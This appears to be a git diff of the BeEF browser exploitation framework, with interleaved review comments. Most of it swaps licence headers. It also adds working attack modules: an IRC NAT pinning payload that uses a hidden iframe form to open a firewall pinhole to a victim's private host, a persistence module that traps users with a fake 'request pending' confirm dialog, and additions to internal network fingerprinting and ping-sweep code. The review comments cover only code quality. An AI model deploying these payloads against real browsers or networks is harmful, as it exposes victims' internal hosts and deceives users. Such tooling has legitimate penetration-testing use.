@@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { if (document.getElementById('torimg')) { diff --git a/modules/network/detect_tor/config.yaml b/modules/network/detect_tor/config.yaml index d0294391e..5dc3db360 100644 --- a/modules/network/detect_tor/config.yaml +++ b/modules/network/detect_tor/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: 
diff --git a/modules/network/detect_tor/module.rb b/modules/network/detect_tor/module.rb index f75c91be9..05f654bf4 100644 --- a/modules/network/detect_tor/module.rb +++ b/modules/network/detect_tor/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Detect_tor < BeEF::Core::Command diff --git a/modules/network/dns_enumeration/command.js b/modules/network/dns_enumeration/command.js index 4e3ea47d0..011af3b91 100644 --- a/modules/network/dns_enumeration/command.js +++ b/modules/network/dns_enumeration/command.js 
@@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var dns_list = "<%= @dns_list %>"; diff --git a/modules/network/dns_enumeration/config.yaml b/modules/network/dns_enumeration/config.yaml index 93327e416..415e79889 100644 --- a/modules/network/dns_enumeration/config.yaml +++ b/modules/network/dns_enumeration/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: 
diff --git a/modules/network/dns_enumeration/module.rb b/modules/network/dns_enumeration/module.rb index 21449af1d..c68595372 100644 --- a/modules/network/dns_enumeration/module.rb +++ b/modules/network/dns_enumeration/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # # DNS Enumeration diff --git a/modules/network/internal_network_fingerprinting/command.js b/modules/network/internal_network_fingerprinting/command.js index 71d742f55..ef7e669a6 100644 --- a/modules/network/internal_network_fingerprinting/command.js +++ b/modules/network/internal_network_fingerprinting/command.js 
@@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var dom = document.createElement('b'); @@ -97,7 +88,8 @@ beef.execute(function() { new Array("Zenoss Core",":8080",false,"/zport/dmd/favicon.ico",16,16), new Array("BeEF",":3000",false,"/ui/media/images/beef.png",200,149), new Array("BeEF (PHP)",":80",false,"/beef/images/beef.gif",32,32), - new Array("Wordpress",":80",false,"/wp-includes/images/wpmini-blue.png",16,16) + new Array("Wordpress",":80",false,"/wp-includes/images/wpmini-blue.png",16,16), + new Array("Glassfish Server",":4848",false,"/theme/com/sun/webui/jsf/suntheme/images/login/gradlogsides.jpg", 1, 200) ); // for each ip diff --git a/modules/network/internal_network_fingerprinting/config.yaml b/modules/network/internal_network_fingerprinting/config.yaml index 2b87ff7c9..46ef6e363 100644 --- a/modules/network/internal_network_fingerprinting/config.yaml +++ b/modules/network/internal_network_fingerprinting/config.yaml 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/network/internal_network_fingerprinting/module.rb b/modules/network/internal_network_fingerprinting/module.rb index b4eff3e26..91a74a2e9 100644 --- a/modules/network/internal_network_fingerprinting/module.rb +++ b/modules/network/internal_network_fingerprinting/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # # Internal Network Fingerprinting 
diff --git a/modules/network/nat_pinning_irc/command.js b/modules/network/nat_pinning_irc/command.js
new file mode 100644
index 000000000..21d3f52eb
--- /dev/null
+++ b/modules/network/nat_pinning_irc/command.js
@@ -0,0 +1,45 @@
+//
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+ var privateip = '<%= @privateip %>';
+ var privateport = '<%= @privateport %>';
+ var connectto = '<%= @connectto %>';
+
+ function dot2dec(dot){
+ var d = dot.split('.');
+ return (((+d[0])*256+(+d[1]))*256+(+d[2]))*256+(+d[3]);
+ }
+
+ var myIframe = beef.dom.createInvisibleIframe();
+ var myForm = document.createElement("form");
+ var action = "http://" + connectto + ":6667/"
+
+ myForm.setAttribute("name", "data");
+ myForm.setAttribute("method", "post");
+ //it must be multipart/form-data so the message appears on separate line
+ myForm.setAttribute("enctype", "multipart/form-data");
+ myForm.setAttribute("action", action);
+
+
+ //create message, refer Samy Kamkar (http://samy.pl/natpin/)
+ x = String.fromCharCode(1);
+ var s = 'PRIVMSG beef :'+x+'DCC CHAT beef '+dot2dec(privateip)+' '+privateport+x+"\n";
+
+ //create message textarea
+ var myExt = document.createElement("textarea");
+ myExt.setAttribute("id","msg_<%= @command_id %>");
+ myExt.setAttribute("name","msg_<%= @command_id %>");
+ myForm.appendChild(myExt);
+ myIframe.contentWindow.document.body.appendChild(myForm);
+
+ //send message
+ myIframe.contentWindow.document.getElementById("msg_<%= @command_id %>").value = s;
+ myForm.submit();
+
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Message sent');
+
+});
diff --git a/modules/network/nat_pinning_irc/config.yaml b/modules/network/nat_pinning_irc/config.yaml
new file mode 100644
index 000000000..fead9f598
--- /dev/null
+++ b/modules/network/nat_pinning_irc/config.yaml
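Review bot: `x = String.fromCharCode(1);` has no `var`, so `x` is created as a global on the page the script runs in, unlike every other variable in the `beef.execute` callback; `var x = String.fromCharCode(1);` keeps it local. The `var action = "http://" + connectto + ":6667/"` line is also the only statement in the file without a terminating semicolon. `dot2dec` would benefit from a one-line comment saying that it converts a dotted-quad IPv4 string into its 32-bit decimal form, because the nested multiplication does not explain itself.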
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ irc_nat_pinning:
+ enable: true
+ category: "Network"
+ name: "IRC NAT Pinning"
+ description: "Attempts to open closed ports on statefull firewalls and attempts to create pinholes on NAT-devices. The firewall/NAT-device must support IRC connection tracking. BeEF will automatically bind a socket on port 6667 (IRC). Then you can connect to the victims public IP on that port. For more information, please refer to: http://samy.pl/natpin/ ."
+ authors: ["Bart Leppens"]
+ target:
+ working: ["FF"]
diff --git a/modules/network/nat_pinning_irc/module.rb b/modules/network/nat_pinning_irc/module.rb
new file mode 100644
index 000000000..75ed299c2
--- /dev/null
+++ b/modules/network/nat_pinning_irc/module.rb
@@ -0,0 +1,33 @@
+#
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Irc_nat_pinning < BeEF::Core::Command
+
+ def pre_send
+ BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind_socket("IRC", "0.0.0.0", 6667)
+ end
+
+ def self.options
+ @configuration = BeEF::Core::Configuration.instance
+ beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
+
+ return [
+ {'name'=>'connectto', 'ui_label' =>'Connect to','value'=>beef_host},
+ {'name'=>'privateip', 'ui_label' =>'Private IP','value'=>'192.168.0.100'},
+ {'name'=>'privateport', 'ui_label' =>'Private Port','value'=>'22'}
+ ]
+ end
+
+ def post_execute
+ return if @datastore['result'].nil?
+ save({'result' => @datastore['result']})
+
+ # wait 30 seconds before unbinding the socket. The HTTP connection will arrive sooner than that anyway.
+ sleep 30
+ BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind_socket("IRC")
+
+ end
+
+end
diff --git a/modules/network/ping_sweep/command.js b/modules/network/ping_sweep/command.js
index acddd61ea..0e4fa7513 100644
--- a/modules/network/ping_sweep/command.js
+++ b/modules/network/ping_sweep/command.js
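Review bot: The listener opened in `pre_send` is closed on only one path: `post_execute` returns early when `@datastore['result']` is nil, before it reaches `unbind_socket("IRC")`, and within this file nothing else unbinds it if `post_execute` is never called. Because the bind address is the literal `"0.0.0.0"`, port 6667 then stays open on every interface of the host running the framework. Putting the unbind in an `ensure` clause of `post_execute`, and taking the bind address from configuration instead of hard-coding all interfaces, would bound that exposure. The `sleep 30` also runs inside `post_execute` itself, so it presumably holds whichever thread delivers the result for that long; the caller is outside this diff, so that needs confirming.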
@@ -1,19 +1,10 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var ips = new Array(); diff --git a/modules/network/ping_sweep/config.yaml b/modules/network/ping_sweep/config.yaml index 1e9fa9a7d..1fd9010d5 100644 --- a/modules/network/ping_sweep/config.yaml +++ b/modules/network/ping_sweep/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: 
diff --git a/modules/network/ping_sweep/module.rb b/modules/network/ping_sweep/module.rb index cc8c7120d..28843fe48 100644 --- a/modules/network/ping_sweep/module.rb +++ b/modules/network/ping_sweep/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # # Ping Sweep Module - jgaliana diff --git a/modules/network/ping_sweep_java/command.js b/modules/network/ping_sweep_java/command.js index cd5fcc719..657ae87a6 100644 --- a/modules/network/ping_sweep_java/command.js +++ b/modules/network/ping_sweep_java/command.js 
@@ -1,19 +1,10 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var ipRange = "<%= @ipRange %>"; diff --git a/modules/network/ping_sweep_java/config.yaml b/modules/network/ping_sweep_java/config.yaml index 5b11939b2..67c0ad693 100644 --- a/modules/network/ping_sweep_java/config.yaml +++ b/modules/network/ping_sweep_java/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: 
diff --git a/modules/network/ping_sweep_java/module.rb b/modules/network/ping_sweep_java/module.rb
index 4342f61f6..cf836dd98 100644
--- a/modules/network/ping_sweep_java/module.rb
+++ b/modules/network/ping_sweep_java/module.rb
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 #
 # Ping Sweep Module - jgaliana
diff --git a/modules/network/ping_sweep_java/pingSweep.java b/modules/network/ping_sweep_java/pingSweep.java
index 0459ebc6a..ea0b31076 100644
--- a/modules/network/ping_sweep_java/pingSweep.java
+++ b/modules/network/ping_sweep_java/pingSweep.java
@@ -1,77 +1,83 @@ -import java.applet.Applet; -import java.io.IOException; -import java.net.InetAddress; -import java.net.UnknownHostException; -import java.util.ArrayList; -import java.util.List; - -/* - * Coded by Michele "antisnatchor" Orru' for the BeEF project. - * Given a single IP or IP range, check without hosts are alive (ping sweep). - */ -public class pingSweep extends Applet { - - public static String ipRange = ""; - public static int timeout = 0; - public static List hostList; - - public pingSweep() { - super(); - return; - } - - public void init(){ - ipRange = getParameter("ipRange"); - timeout = Integer.parseInt(getParameter("timeout")); - } - - //called from JS - public static int getHostsNumber(){ - try{ - hostList = parseIpRange(ipRange); - }catch(UnknownHostException e){ //do something - - } - return hostList.size(); - } - - //called from JS - public static String getAliveHosts(){ - String result = ""; - try{ - result = checkHosts(hostList); - }catch(IOException io){ - //do something - } - return result; - } - - private static List parseIpRange(String ipRange) throws UnknownHostException { - - List addresses = new ArrayList(); - if (ipRange.indexOf("-") != -1) { //multiple IPs: ipRange = 172.31.229.240-172.31.229.250 - String[] ips = ipRange.split("-"); - String[] octets = ips[0].split("\\."); - int lowerBound = Integer.parseInt(octets[3]); - int upperBound = Integer.parseInt(ips[1].split("\\.")[3]); - - for (int i = lowerBound; i <= upperBound; i++) { - String ip = octets[0] + "." + octets[1] + "." + octets[2] + "." 
+ i; - addresses.add(InetAddress.getByName(ip)); - } - } else { //single ip: ipRange = 172.31.229.240 - addresses.add(InetAddress.getByName(ipRange)); - } - return addresses; - } - - private static String checkHosts(List inetAddresses) throws IOException { - String alive = ""; - for (InetAddress inetAddress : inetAddresses) { - if (inetAddress.isReachable(timeout)) { - alive += inetAddress.toString() + "\n"; - } - } - return alive; - } -} +/* + * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net + * Browser Exploitation Framework (BeEF) - http://beefproject.com + * See the file 'doc/COPYING' for copying permission + */ + +import java.applet.Applet; +import java.io.IOException; +import java.net.InetAddress; +import java.net.UnknownHostException; +import java.util.ArrayList; +import java.util.List; + +/* + * Coded by Michele "antisnatchor" Orru' for the BeEF project. + * Given a single IP or IP range, check without hosts are alive (ping sweep). + */ +public class pingSweep extends Applet { + + public static String ipRange = ""; + public static int timeout = 0; + public static List hostList; + + public pingSweep() { + super(); + return; + } + + public void init(){ + ipRange = getParameter("ipRange"); + timeout = Integer.parseInt(getParameter("timeout")); + } + + //called from JS + public static int getHostsNumber(){ + try{ + hostList = parseIpRange(ipRange); + }catch(UnknownHostException e){ //do something + + } + return hostList.size(); + } + + //called from JS + public static String getAliveHosts(){ + String result = ""; + try{ + result = checkHosts(hostList); + }catch(IOException io){ + //do something + } + return result; + } + + private static List parseIpRange(String ipRange) throws UnknownHostException { + + List addresses = new ArrayList(); + if (ipRange.indexOf("-") != -1) { //multiple IPs: ipRange = 172.31.229.240-172.31.229.250 + String[] ips = ipRange.split("-"); + String[] octets = ips[0].split("\\."); + int lowerBound = Integer.parseInt(octets[3]); 
+ int upperBound = Integer.parseInt(ips[1].split("\\.")[3]); + + for (int i = lowerBound; i <= upperBound; i++) { + String ip = octets[0] + "." + octets[1] + "." + octets[2] + "." + i; + addresses.add(InetAddress.getByName(ip)); + } + } else { //single ip: ipRange = 172.31.229.240 + addresses.add(InetAddress.getByName(ipRange)); + } + return addresses; + } + + private static String checkHosts(List inetAddresses) throws IOException { + String alive = ""; + for (InetAddress inetAddress : inetAddresses) { + if (inetAddress.isReachable(timeout)) { + alive += inetAddress.toString() + "\n"; + } + } + return alive; + } +} diff --git a/modules/network/port_scanner/command.js b/modules/network/port_scanner/command.js index 415c914e6..dd633f7eb 100644 --- a/modules/network/port_scanner/command.js +++ b/modules/network/port_scanner/command.js 
@@ -1,19 +1,10 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var blocked_ports = [ 1, 7, 9, 11, 13, 15, 17, 19, 20, 21, 22, 23, 25, 37, 42, 43, 53, 77, 79, 87, 95, 101, 102, 103, 104, 109, 110, 111, 113, 115, 117, 119, 123, 135, 139, 143, 179, 389, 465, 512, 513, 514, 515, 526, 530, 531, 532, 540, 556, 563, 587, 601, 636, 993, 995, 2049, 3659, 4045, 6000, 6665, 6666, 6667, 6668, 6669, 65535 ]; diff --git a/modules/network/port_scanner/config.yaml b/modules/network/port_scanner/config.yaml index a1ac2d103..ea54c96c1 100644 --- a/modules/network/port_scanner/config.yaml +++ b/modules/network/port_scanner/config.yaml 
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
 module:
diff --git a/modules/network/port_scanner/module.rb b/modules/network/port_scanner/module.rb
index 4b0957bdd..a76072c84 100644
--- a/modules/network/port_scanner/module.rb
+++ b/modules/network/port_scanner/module.rb
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 #
 # Port Scanner Module - javier.marcos
diff --git a/modules/persistence/confirm_close_tab/command.js b/modules/persistence/confirm_close_tab/command.js
new file mode 100644
index 000000000..9bdbb31f3
--- /dev/null
+++ b/modules/persistence/confirm_close_tab/command.js
@@ -0,0 +1,36 @@
+//
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+ function display_confirm(){
+ if(confirm("Are you sure you want to navigate away from this page?\n\n There is currently a request to the server pending. You will lose recent changes by navigating away.\n\n Press OK to continue, or Cancel to stay on the current page.")){
+ display_confirm();
+ }
+ }
+
+ function dontleave(e){
+ e = e || window.event;
+
+ if(beef.browser.isIE()){
+ e.cancelBubble = true;
+ e.returnValue = "There is currently a request to the server pending. You will lose recent changes by navigating away.";
+ }else{
+ if (e.stopPropagation) {
+ e.stopPropagation();
+ e.preventDefault();
+ }
+ }
+
+ //re-display the confirm dialog if the user clicks OK (to leave the page)
+ display_confirm();
+ return "There is currently a request to the server pending. You will lose recent changes by navigating away.";
+ }
+
+ window.onbeforeunload = dontleave;
+
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'Module executed successfully');
+});
diff --git a/modules/persistence/confirm_close_tab/config.yaml b/modules/persistence/confirm_close_tab/config.yaml
new file mode 100644
index 000000000..40553840b
--- /dev/null
+++ b/modules/persistence/confirm_close_tab/config.yaml
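Review bot: The status string passed to `beef.net.send` at the end of command.js carries no `result=` key, yet `post_execute` in this module's module.rb saves `@datastore['result']`, so the saved result is probably empty; iframe_above in the same commit sends `'result=Links have been rewritten to spawn an iFrame.'`. Changing the argument to `'result=Module executed successfully'` would match that convention. Separately, `dontleave` calls `confirm()` from inside the `onbeforeunload` handler, and current browsers commonly suppress dialogs raised there and replace the returned text with their own; a comment above `window.onbeforeunload = dontleave;` such as `// NOTE: many browsers ignore dialogs and custom text in beforeunload` would record that limit for readers of the module.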
@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ confirm_close_tab:
+ enable: true
+ category: "Persistence"
+ name: "Confirm Close Tab"
+ description: "Shows a confirm dialog to the user when he tries to close a tab. If he click yes, re-display the confirm dialog. Doesn't work on Opera < 12"
+ authors: ["antisnatchor"]
+ target:
+ user_notify: ["ALL"]
+ not_working: ["O"]
\ No newline at end of file
diff --git a/modules/persistence/confirm_close_tab/module.rb b/modules/persistence/confirm_close_tab/module.rb
new file mode 100644
index 000000000..a523c63aa
--- /dev/null
+++ b/modules/persistence/confirm_close_tab/module.rb
@@ -0,0 +1,12 @@
+#
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Confirm_close_tab < BeEF::Core::Command
+
+ def post_execute
+ save({'result' => @datastore['result']})
+ end
+
+end
diff --git a/modules/persistence/iframe_above/command.js b/modules/persistence/iframe_above/command.js
index 3cf076368..db8185d5f 100644
--- a/modules/persistence/iframe_above/command.js
+++ b/modules/persistence/iframe_above/command.js
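Review bot: The description in confirm_close_tab/config.yaml says the module fails only on Opera < 12, but `not_working: ["O"]` marks every Opera version, so the two statements disagree and one of them should be corrected; whether a target entry can carry a version bound is not visible in this hunk. The description also says "If he click yes" while the dialog in command.js offers OK and Cancel, so wording such as `description: "Shows a confirm dialog when the user tries to close the tab. If they press OK, the dialog is shown again. Doesn't work on Opera < 12"` would be more accurate. The file also ends without a trailing newline.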
@@ -1,19 +1,10 @@
 //
-// Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-// Licensed under the Apache License, Version 2.0 (the "License");
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-//
-// http://www.apache.org/licenses/LICENSE-2.0
-//
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an "AS IS" BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
- beef.session.persistent();
+ beef.dom.persistentIframe();
